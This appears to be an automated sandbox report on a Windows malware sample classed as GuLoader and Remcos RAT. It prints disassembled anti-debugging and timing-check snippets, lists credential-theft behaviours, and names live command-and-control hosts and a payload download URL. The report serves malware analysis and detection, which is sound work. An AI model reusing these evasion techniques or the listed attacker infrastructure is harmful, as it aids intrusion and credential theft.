      Source: C:\Users\user\Desktop\loKmeabs9V.exeRDTSC instruction interceptor: First address: 00000000022B71DE second address: 00000000022B71DE instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a cmp bx, dx 0x0000000d jne 00007F72D4EAA1F5h 0x0000000f push dword ptr [esp+04h] 0x00000013 call 00007F72D4EAA40Bh 0x00000018 pushad 0x00000019 nop 0x0000001a nop 0x0000001b mov eax, 00000001h 0x00000020 cpuid 0x00000022 popad 0x00000023 mov ebx, dword ptr [esp+04h] 0x00000027 xor ecx, ecx 0x00000029 add ecx, 02h 0x0000002c cmp word ptr [ebx+ecx], 0000h 0x00000031 jne 00007F72D4EAA218h 0x00000033 add ecx, 02h 0x00000036 cmp word ptr [ebx+ecx], 0000h 0x0000003b jne 00007F72D4EAA218h 0x0000003d add ecx, 02h 0x00000040 cmp word ptr [ebx+ecx], 0000h 0x00000045 jne 00007F72D4EAA218h 0x00000047 add ecx, 02h 0x0000004a cmp word ptr [ebx+ecx], 0000h 0x0000004f jne 00007F72D4EAA218h 0x00000051 add ecx, 02h 0x00000054 cmp word ptr [ebx+ecx], 0000h 0x00000059 jne 00007F72D4EAA218h 0x0000005b add ecx, 02h 0x0000005e cmp word ptr [ebx+ecx], 0000h 0x00000063 jne 00007F72D4EAA218h 0x00000065 add ecx, 02h 0x00000068 cmp word ptr [ebx+ecx], 0000h 0x0000006d jne 00007F72D4EAA218h 0x0000006f retn 0004h 0x00000072 sub ecx, 02h 0x00000075 add eax, 02h 0x00000078 cmp esi, 68CDCEE6h 0x0000007e mov bx, word ptr [eax+ecx] 0x00000082 mov dx, word ptr [esi+ecx] 0x00000086 pushad 0x00000087 rdtsc
      Source: C:\Users\user\Desktop\loKmeabs9V.exeRDTSC instruction interceptor: First address: 00000000022B2448 second address: 00000000022B2448 instructions:
      Source: C:\Users\user\Desktop\loKmeabs9V.exeRDTSC instruction interceptor: First address: 0000000000567F30 second address: 0000000000567F30 instructions: 0x00000000 rdtsc 0x00000002 mov eax, A494EE6Bh 0x00000007 xor eax, 6C4D1677h 0x0000000c xor eax, 6E4EF001h 0x00000011 xor eax, A697081Ch 0x00000016 cpuid 0x00000018 popad 0x00000019 call 00007F72D4EAA22Ah 0x0000001e lfence 0x00000021 mov edx, 2EA7C992h 0x00000026 xor edx, 079D8C51h 0x0000002c xor edx, 2142E10Eh 0x00000032 xor edx, 7786A4D9h 0x00000038 mov edx, dword ptr [edx] 0x0000003a lfence 0x0000003d cmp dx, ax 0x00000040 ret 0x00000041 sub edx, esi 0x00000043 ret 0x00000044 cmp cl, dl 0x00000046 add edi, edx 0x00000048 dec dword ptr [ebp+000000F8h] 0x0000004e cmp dword ptr [ebp+000000F8h], 00000000h 0x00000055 jne 00007F72D4EAA208h 0x00000057 test eax, ebx 0x00000059 call 00007F72D4EAA26Fh 0x0000005e call 00007F72D4EAA24Bh 0x00000063 lfence 0x00000066 mov edx, 2EA7C992h 0x0000006b xor edx, 079D8C51h 0x00000071 xor edx, 2142E10Eh 0x00000077 xor edx, 7786A4D9h 0x0000007d mov edx, dword ptr [edx] 0x0000007f lfence 0x00000082 cmp dx, ax 0x00000085 ret 0x00000086 mov esi, edx 0x00000088 pushad 0x00000089 rdtsc
      Source: C:\Users\user\Desktop\loKmeabs9V.exeRDTSC instruction interceptor: First address: 0000000000567F7B second address: 0000000000567F7B instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 012985CBh 0x00000013 xor eax, 524C1329h 0x00000018 add eax, C04F8477h 0x0000001d sub eax, 13B51B58h 0x00000022 cpuid 0x00000024 test dx, bx 0x00000027 bt ecx, 1Fh 0x0000002b jc 00007F72D4A95E56h 0x00000031 popad 0x00000032 call 00007F72D4A958CFh 0x00000037 lfence 0x0000003a rdtsc
      Source: C:\Users\user\Desktop\loKmeabs9V.exeRDTSC instruction interceptor: First address: 00000000005688F0 second address: 0000000000568A77 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b cmp eax, 6AACECEFh 0x00000010 mov eax, dword ptr [esp+1Ch] 0x00000014 mov byte ptr [eax], 00000006h 0x00000017 xor byte ptr [eax], 00000055h 0x0000001a add byte ptr [eax], 00000051h 0x0000001d sub byte ptr [eax], 0000003Ah 0x00000020 mov byte ptr [eax+01h], FFFFFFD2h 0x00000024 xor byte ptr [eax+01h], 00000000h 0x00000028 cmp ah, dh 0x0000002a xor byte ptr [eax+01h], FFFFFFEEh 0x0000002e jmp 00007F72D4EAA309h 0x00000033 cmp cl, 00000013h 0x00000036 add byte ptr [eax+01h], FFFFFFC4h 0x0000003a mov byte ptr [eax+02h], 0000007Eh 0x0000003e cmp bx, 1188h 0x00000043 xor byte ptr [eax+02h], 00000067h 0x00000047 cmp ax, 000008E1h 0x0000004b cmp ax, cx 0x0000004e xor byte ptr [eax+02h], FFFFFFD8h 0x00000052 pushad 0x00000053 mov al, 9Ah 0x00000055 cmp al, 9Ah 0x00000057 jne 00007F72D4EAB46Bh 0x0000005d popad 0x0000005e sub byte ptr [eax+02h], 00000009h 0x00000062 mov edx, dword ptr [ebp+00000138h] 0x00000068 mov dword ptr [eax+03h], edx 0x0000006b pushad 0x0000006c mov eax, 000000EDh 0x00000071 cpuid 0x00000073 popad 0x00000074 mov byte ptr [eax+07h], FFFFFFE2h 0x00000078 xor byte ptr [eax+07h], 00000026h 0x0000007c sub byte ptr [eax+07h], FFFFFF9Fh 0x00000080 xor byte ptr [eax+07h], FFFFFFDAh 0x00000084 test al, al 0x00000086 test dh, ch 0x00000088 mov byte ptr [eax+08h], 0000001Dh 0x0000008c xor byte ptr [eax+08h], FFFFFFACh 0x00000090 add byte ptr [eax+08h], 00000028h 0x00000094 sub byte ptr [eax+08h], 00000009h 0x00000098 cmp dx, B8CFh 0x0000009d pushad 0x0000009e mov edx, 0000005Dh 0x000000a3 rdtsc
      Source: C:\Users\user\Desktop\loKmeabs9V.exeRDTSC instruction interceptor: First address: 0000000000562448 second address: 0000000000562448 instructions:
      Source: C:\Users\user\Desktop\loKmeabs9V.exeRDTSC instruction interceptor: First address: 0000000000565FAF second address: 0000000000565FAF instructions:
      Source: C:\Users\user\Desktop\loKmeabs9V.exeRDTSC instruction interceptor: First address: 0000000000569D77 second address: 0000000000569D95 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b mov eax, B8F5A615h 0x00000010 xor eax, 6BC0978Fh 0x00000015 sub eax, FE90C053h 0x0000001a pushad 0x0000001b lfence 0x0000001e rdtsc
      Source: C:\Users\user\Desktop\loKmeabs9V.exeRDTSC instruction interceptor: First address: 0000000000569DDA second address: 0000000000569DDA instructions:
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B962D rdtsc 0_2_022B962D
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,22_2_0040DD85
      Source: C:\Users\user\Desktop\loKmeabs9V.exeWindow / User API: threadDelayed 9093Jump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeWindow / User API: foregroundWindowGot 536Jump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exe TID: 2000Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exe TID: 5704Thread sleep count: 9093 > 30Jump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exe TID: 5704Thread sleep time: -45465s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeThread sleep count: Count: 9093 delay: -5Jump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_0040AE51 FindFirstFileW,FindNextFileW,22_2_0040AE51
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 23_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,23_2_00407898
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 24_2_00407C87 FindFirstFileA,FindNextFileA,strlen,strlen,24_2_00407C87
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_00418981 memset,GetSystemInfo,22_2_00418981
      Source: loKmeabs9V.exe, 00000000.00000002.336058548.00000000022C0000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll\yourphone.exe\subfolder1Software\Microsoft\Windows\CurrentVersion\RunOnceStartup key
      Source: loKmeabs9V.exe, 00000000.00000002.336058548.00000000022C0000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\loKmeabs9V.exeSystem information queried: ModuleInformationJump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess information queried: ProcessInformationJump to behavior

      Anti Debugging:

      barindex
      Hides threads from debuggersShow sources
      Source: C:\Users\user\Desktop\loKmeabs9V.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeThread information set: HideFromDebuggerJump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess queried: DebugPortJump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B962D rdtsc 0_2_022B962D
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B6694 LdrInitializeThunk,0_2_022B6694
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,22_2_0040DD85
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,22_2_004044A4
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B548E mov eax, dword ptr fs:[00000030h]0_2_022B548E
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B2C93 mov eax, dword ptr fs:[00000030h]0_2_022B2C93
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B36C3 mov eax, dword ptr fs:[00000030h]0_2_022B36C3
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B7B16 mov eax, dword ptr fs:[00000030h]0_2_022B7B16
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B87E3 mov eax, dword ptr fs:[00000030h]0_2_022B87E3
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B73F1 mov eax, dword ptr fs:[00000030h]0_2_022B73F1
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess token adjusted: DebugJump to behavior

      HIPS / PFW / Operating System Protection Evasion:

      barindex
      Injects a PE file into a foreign processesShow sources
      Source: C:\Users\user\Desktop\loKmeabs9V.exeMemory written: C:\Users\user\Desktop\loKmeabs9V.exe base: 400000 value starts with: 4D5AJump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeMemory written: C:\Users\user\Desktop\loKmeabs9V.exe base: 400000 value starts with: 4D5AJump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeMemory written: C:\Users\user\Desktop\loKmeabs9V.exe base: 400000 value starts with: 4D5AJump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess created: C:\Users\user\Desktop\loKmeabs9V.exe 'C:\Users\user\Desktop\loKmeabs9V.exe' Jump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess created: C:\Users\user\Desktop\loKmeabs9V.exe C:\Users\user\Desktop\loKmeabs9V.exe /stext 'C:\Users\user\AppData\Local\Temp\syqduvyml'Jump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess created: C:\Users\user\Desktop\loKmeabs9V.exe C:\Users\user\Desktop\loKmeabs9V.exe /stext 'C:\Users\user\AppData\Local\Temp\cawvvojfhdxf'Jump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeProcess created: C:\Users\user\Desktop\loKmeabs9V.exe C:\Users\user\Desktop\loKmeabs9V.exe /stext 'C:\Users\user\AppData\Local\Temp\fubgoguhvlpsyny'Jump to behavior
      Source: loKmeabs9V.exe, 0000000E.00000002.1287036124.0000000000FB0000.00000002.00000001.sdmpBinary or memory string: Program Manager
      Source: loKmeabs9V.exe, 0000000E.00000002.1287036124.0000000000FB0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
      Source: loKmeabs9V.exe, 0000000E.00000002.1287036124.0000000000FB0000.00000002.00000001.sdmpBinary or memory string: Progman
      Source: logs.dat.14.drBinary or memory string: [ Program Manager ]
      Source: loKmeabs9V.exe, 0000000E.00000002.1287036124.0000000000FB0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 0_2_022B73AF cpuid 0_2_022B73AF
      Source: C:\Users\user\Desktop\loKmeabs9V.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_0041881C GetSystemTime,memcpy,GetCurrentProcessId,memcpy,GetTickCount,memcpy,QueryPerformanceCounter,memcpy,22_2_0041881C
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 23_2_00407C79 memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,23_2_00407C79
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: 22_2_0041739B GetVersionExW,22_2_0041739B
      Source: C:\Users\user\Desktop\loKmeabs9V.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

      Stealing of Sensitive Information:

      barindex
      GuLoader behavior detectedShow sources
      Source: Initial fileSignature Results: GuLoader behavior
      Yara detected Remcos RATShow sources
      Source: Yara matchFile source: 0000000E.00000002.1286073742.0000000000757000.00000004.00000020.sdmp, type: MEMORY
      Tries to harvest and steal browser information (history, passwords, etc)Show sources
      Source: C:\Users\user\Desktop\loKmeabs9V.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
      Tries to steal Instant Messenger accounts or passwordsShow sources
      Source: C:\Users\user\Desktop\loKmeabs9V.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
      Tries to steal Mail credentials (via file access)Show sources
      Source: C:\Users\user\Desktop\loKmeabs9V.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
      Source: C:\Users\user\Desktop\loKmeabs9V.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
      Tries to steal Mail credentials (via file registry)Show sources
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: ESMTPPassword24_2_004033E2
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword24_2_00402DA5
      Source: C:\Users\user\Desktop\loKmeabs9V.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword24_2_00402DA5

      Remote Access Functionality:

      barindex
      Yara detected Remcos RATShow sources
      Source: Yara matchFile source: 0000000E.00000002.1286073742.0000000000757000.00000004.00000020.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsNative API1Application Shimming1Application Shimming1Deobfuscate/Decode Files or Information1OS Credential Dumping1System Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScheduled Task/JobRegistry Run Keys / Startup Folder11Access Token Manipulation1Obfuscated Files or Information3Input Capture11Account Discovery1Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothEncrypted Channel2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Process Injection112Software Packing12Credentials in Registry2File and Directory Discovery1SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Registry Run Keys / Startup Folder11Masquerading1Credentials In Files1System Information Discovery329Distributed Component Object ModelInput Capture11Scheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptVirtualization/Sandbox Evasion23LSA SecretsSecurity Software Discovery731SSHClipboard Data1Data Transfer Size LimitsApplication Layer Protocol212Manipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonAccess Token Manipulation1Cached Domain CredentialsVirtualization/Sandbox Evasion23VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection112DCSyncProcess Discovery4Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadowSystem Owner/User Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork SniffingRemote System Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 signatures2 2 Behavior Graph ID: 457916 Sample: loKmeabs9V.exe Startdate: 02/08/2021 Architecture: WINDOWS Score: 100 33 Found malware configuration 2->33 35 Multi AV Scanner detection for dropped file 2->35 37 Multi AV Scanner detection for submitted file 2->37 39 8 other signatures 2->39 7 loKmeabs9V.exe 1 2 2->7         started        process3 signatures4 41 Detected unpacking (changes PE section rights) 7->41 43 Tries to steal Mail credentials (via file registry) 7->43 45 Creates autostart registry keys with suspicious values (likely registry only malware) 7->45 47 5 other signatures 7->47 10 loKmeabs9V.exe 2 11 7->10         started        process5 dnsIp6 29 101.99.94.119, 49734, 80 SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY Malaysia 10->29 31 wealthyrem.ddns.net 194.5.97.128, 39200, 49735, 49736 DANILENKODE Netherlands 10->31 23 C:\Users\user\AppData\Local\...\yourphone.exe, PE32 10->23 dropped 25 C:\Users\user\AppData\Local\...\yourphone.vbs, ASCII 10->25 dropped 49 Tries to detect Any.run 10->49 51 Hides threads from debuggers 10->51 53 Installs a global keyboard hook 10->53 55 Injects a PE file into a foreign processes 10->55 15 loKmeabs9V.exe 1 10->15         started        18 loKmeabs9V.exe 13 10->18         started        21 loKmeabs9V.exe 1 10->21         started        file7 signatures8 process9 dnsIp10 57 Tries to steal Instant Messenger accounts or passwords 15->57 59 Tries to steal Mail credentials (via file access) 15->59 27 192.168.2.1 unknown unknown 18->27 61 Tries to harvest and steal browser information (history, passwords, etc) 18->61 signatures11

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      loKmeabs9V.exe20%VirustotalBrowse
      loKmeabs9V.exe13%ReversingLabsWin32.Trojan.Vebzenpak
      loKmeabs9V.exe100%Joe Sandbox ML

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\subfolder1\yourphone.exe100%Joe Sandbox ML
      C:\Users\user\AppData\Local\Temp\subfolder1\yourphone.exe20%VirustotalBrowse
      C:\Users\user\AppData\Local\Temp\subfolder1\yourphone.exe6%MetadefenderBrowse
      C:\Users\user\AppData\Local\Temp\subfolder1\yourphone.exe13%ReversingLabsWin32.Trojan.Vebzenpak

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      22.2.loKmeabs9V.exe.400000.0.unpack100%AviraHEUR/AGEN.1116566Download File
      23.2.loKmeabs9V.exe.400000.0.unpack100%AviraHEUR/AGEN.1116590Download File
      24.2.loKmeabs9V.exe.400000.0.unpack100%AviraHEUR/AGEN.1116590Download File
      22.0.loKmeabs9V.exe.400000.0.unpack100%AviraTR/Patched.Ren.Gen2Download File

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://www.imvu.comr0%URL Reputationsafe
      http://101.99.94.119/WEALTH_PRUuqVZw139.bin0%Avira URL Cloudsafe
      http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com0%Avira URL Cloudsafe
      http://www.ebuddy.com0%URL Reputationsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      wealthyrem.ddns.net
      		194.5.97.128
      		truetrue
        		unknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://101.99.94.119/WEALTH_PRUuqVZw139.bintrue
        • Avira URL Cloud: safe
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://www.imvu.com/.exeloKmeabs9V.exe, 00000017.00000002.470384906.000000000019C000.00000004.00000001.sdmpfalse
          		high
          https://www.google.comloKmeabs9V.exefalse
            		high
            http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exeloKmeabs9V.exe, 00000016.00000003.470222066.0000000000A02000.00000004.00000001.sdmpfalse
              		high
              http://www.imvu.comrloKmeabs9V.exe, 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmpfalse
              • URL Reputation: safe
              		unknown
              https://support.google.com/chrome/answer/6258784loKmeabs9V.exe, 00000016.00000003.471770618.0000000000A18000.00000004.00000001.sdmpfalse
                		high
                http://www.imvu.comloKmeabs9V.exefalse
                  		high
                  https://www.google.com/chrome/static/images/favicons/favicon-16x16.pngloKmeabs9V.exe, 00000016.00000002.473021402.00000000006E8000.00000004.00000020.sdmpfalse
                    		high
                    https://support.google.com/chrome/?p=plugin_flashloKmeabs9V.exe, 00000016.00000003.471770618.0000000000A18000.00000004.00000001.sdmpfalse
                      		high
                      https://www.google.com/accounts/serviceloginloKmeabs9V.exefalse
                        		high
                        https://login.yahoo.com/config/loginloKmeabs9V.exefalse
                          		high
                          http://www.nirsoft.netloKmeabs9V.exe, 00000016.00000002.472368637.0000000000193000.00000004.00000001.sdmpfalse
                            		high
                            http://www.nirsoft.net/loKmeabs9V.exe, loKmeabs9V.exe, 00000018.00000002.471540483.0000000000400000.00000040.00000001.sdmpfalse
                              		high
                              http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comloKmeabs9V.exe, 00000017.00000002.470426218.0000000000400000.00000040.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.ebuddy.comloKmeabs9V.exefalse
                              • URL Reputation: safe
                              		unknown

                              Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public

                              IPDomainCountryFlagASNASN NameMalicious
                              194.5.97.128
                              		wealthyrem.ddns.netNetherlands
                              		208476DANILENKODEtrue
                              101.99.94.119
                              		unknownMalaysia
                              		45839SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMYtrue

                              Private

                              IP
                              192.168.2.1

                              General Information

                              Joe Sandbox Version:33.0.0 White Diamond
                              Analysis ID:457916
                              Start date:02.08.2021
                              Start time:14:59:17
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 17m 17s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Sample file name:loKmeabs9V.exe
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                              Run name:Suspected Instruction Hammering Hide Perf
                              Number of analysed new started processes analysed:41
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal100.phis.troj.spyw.evad.winEXE@9/4@1/3
                              EGA Information:Failed
                              HDC Information:
                              • Successful, ratio: 50.6% (good quality ratio 40.6%)
                              • Quality average: 62.4%
                              • Quality standard deviation: 38.4%
                              HCA Information:Failed
                              Cookbook Comments:
                              • Adjust boot time
                              • Enable AMSI
                              • Found application associated with file extension: .exe
                              Warnings:
                              Show All
                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, MusNotifyIcon.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                              • Excluded IPs from analysis (whitelisted): 13.88.21.125, 168.61.161.212, 20.49.157.6, 23.211.4.86, 93.184.221.240, 40.112.88.60, 80.67.82.211, 80.67.82.235, 20.50.102.62, 20.54.110.249, 20.190.160.134, 20.190.160.8, 20.190.160.71, 20.190.160.4, 20.190.160.75, 20.190.160.129, 20.190.160.67, 20.190.160.132, 51.124.78.146, 20.49.150.241, 20.82.210.154
                              • Excluded domains from analysis (whitelisted): www.tm.lg.prod.aadmsa.akadns.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, login.live.com, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, ris-prod.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, settings-win.data.microsoft.com, www.tm.a.prd.aadg.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, login.msa.msidentity.com, settingsfd-geo.trafficmanager.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, 